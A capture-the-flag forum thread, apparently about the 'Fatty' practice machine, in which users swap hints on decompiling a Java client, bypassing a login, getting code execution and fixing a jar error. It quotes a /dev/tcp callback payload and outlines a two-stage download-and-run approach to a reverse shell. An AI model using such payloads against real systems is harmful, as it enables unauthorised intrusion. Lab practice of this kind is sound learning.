Fatty

Type your comment> @tel0s said:

Type your comment> @0x41 said:

Type your comment> @tel0s said:

stuck on the user part - I’ve managed to get server bins, know i need to find a route to get admin be able to call the “not fully implemented” function (you know what I’m talking about). Continuing to fail in defeating the login due to the username in payload messing up hashing for successful auth. Am I rabbit holed?

i was in the same boat as you before figuring out how to get around that (and later seeing other peoples logins and realising i didn’t even need to get around that lol)

where does the hashing happen?

I got past it, and am at code exec stage, but I cannot for the life of me get it to call back. not sure if it’s my payload “echo 1 > /dev/tcp/blah/port” or the gadget in the tool. I’ve tried a few.

no redirecions, one argument only. i recommend doing it in two stages

Type your comment> @0x41 said:

Type your comment> @tel0s said:

Type your comment> @0x41 said:

Type your comment> @tel0s said:

stuck on the user part - I’ve managed to get server bins, know i need to find a route to get admin be able to call the “not fully implemented” function (you know what I’m talking about). Continuing to fail in defeating the login due to the username in payload messing up hashing for successful auth. Am I rabbit holed?

i was in the same boat as you before figuring out how to get around that (and later seeing other peoples logins and realising i didn’t even need to get around that lol)

where does the hashing happen?

I got past it, and am at code exec stage, but I cannot for the life of me get it to call back. not sure if it’s my payload “echo 1 > /dev/tcp/blah/port” or the gadget in the tool. I’ve tried a few.

no redirecions, one argument only. i recommend doing it in two stages

I have pingback working, but I can’t get a shell. I’ve tried the two stage method, pulling a script into tmp for first stage, then execute it for second, but I cant find a second stage that works. perl etc.

Type your comment> @tel0s said:

Type your comment> @0x41 said:

Type your comment> @tel0s said:

Type your comment> @0x41 said:

Type your comment> @tel0s said:

stuck on the user part - I’ve managed to get server bins, know i need to find a route to get admin be able to call the “not fully implemented” function (you know what I’m talking about). Continuing to fail in defeating the login due to the username in payload messing up hashing for successful auth. Am I rabbit holed?

i was in the same boat as you before figuring out how to get around that (and later seeing other peoples logins and realising i didn’t even need to get around that lol)

where does the hashing happen?

I got past it, and am at code exec stage, but I cannot for the life of me get it to call back. not sure if it’s my payload “echo 1 > /dev/tcp/blah/port” or the gadget in the tool. I’ve tried a few.

no redirecions, one argument only. i recommend doing it in two stages

I have pingback working, but I can’t get a shell. I’ve tried the two stage method, pulling a script into tmp for first stage, then execute it for second, but I cant find a second stage that works. perl etc.

if you have only one argument you can pass, how can you put it in /tmp? :wink:
don’t worry about where you put it, just download it and try running it from that directory

Type your comment> @0x41 said:

Type your comment> @tel0s said:

Type your comment> @0x41 said:

Type your comment> @tel0s said:

Type your comment> @0x41 said:

Type your comment> @tel0s said:

stuck on the user part - I’ve managed to get server bins, know i need to find a route to get admin be able to call the “not fully implemented” function (you know what I’m talking about). Continuing to fail in defeating the login due to the username in payload messing up hashing for successful auth. Am I rabbit holed?

i was in the same boat as you before figuring out how to get around that (and later seeing other peoples logins and realising i didn’t even need to get around that lol)

where does the hashing happen?

I got past it, and am at code exec stage, but I cannot for the life of me get it to call back. not sure if it’s my payload “echo 1 > /dev/tcp/blah/port” or the gadget in the tool. I’ve tried a few.

no redirecions, one argument only. i recommend doing it in two stages

I have pingback working, but I can’t get a shell. I’ve tried the two stage method, pulling a script into tmp for first stage, then execute it for second, but I cant find a second stage that works. perl etc.

if you have only one argument you can pass, how can you put it in /tmp? :wink:
don’t worry about where you put it, just download it and try running it from that directory

You can definitely have more than one argument - I’ve just got user. problem is redirection chars etc.

Type your comment> @ue4dai said:

Type your comment> @CyberGeek01 said:

(Quote)
jd-gui seems to work fine.

I really thank you for this suggestion. It work very well

Type your comment> @CyberGeek01 said:

Type your comment> @ue4dai said:

Type your comment> @CyberGeek01 said:

(Quote)
jd-gui seems to work fine.

I really thank you for this suggestion. It work very well

Sure thing! Happy to pass the hint along.

Can somebody pm for the admin trick ? I have a very specific question. I do not know why this technique does not working. :confused:

For gaining user level reverse shell was there much editing of source code to allow the exploitation of the OWASP method? I am struggling to get a callback and am worried I botched the code.

Same happening to me. Have tried sending many payload variations from a common tool but have not gotten anything back. Wondering if I need to go deeper and create my own custom one that can be properly cast.

Type your comment> @Iris said:

For gaining user level reverse shell was there much editing of source code to allow the exploitation of the OWASP method? I am struggling to get a callback and am worried I botched the code.

Hello! There are need to write a custom Shell? Idk but at the moment I am stuk with the debugging and fixing of fy-ct.jr
Can you give me a suggestion? thanks!

Hi, i’m struggling with the initial foothold. I’m using recaf but not really seeing where should I work. Could anyone give me a nudge?

Eager to discuss the user payload with someone. Can’t figure out why I get nothing back.

Edit: always (usually?) update your tools. Now onto root.

Got root! It was fascinating. Nice and fun box! Thanks @qtc and thanks for support @alesc.

Never mind, i got it

is there need to get source code of server? i decompiled client and only look at it.

ty :wink:

Managed to get user, but have no clue how to escalate to root. If someone could give me a nudge that goes beyond “connect the dots”, I would be really grateful :wink:

I have finished initial enumeration. I pulled the .jar file into ghidra. Looking at all the posts, I should be using jd-gui instead? Thank you in advance.

Type your comment> @zard said:

Type your comment> @red0nyx said:

Getting this error in Java client Caused by: java.lang.SecurityException: SHA-256 digest error for b…xml | already change the settings but don’t seem to get it to work any help is appreciated!

you need to update the jar file

How do I update the jar file?

@Hackalicious said:
Type your comment> @zard said:

Type your comment> @red0nyx said:

Getting this error in Java client Caused by: java.lang.SecurityException: SHA-256 digest error for b…xml | already change the settings but don’t seem to get it to work any help is appreciated!

you need to update the jar file

How do I update the jar file?

used “jar uf jar-file fatty-*****t.jar”

not working … never mind got it.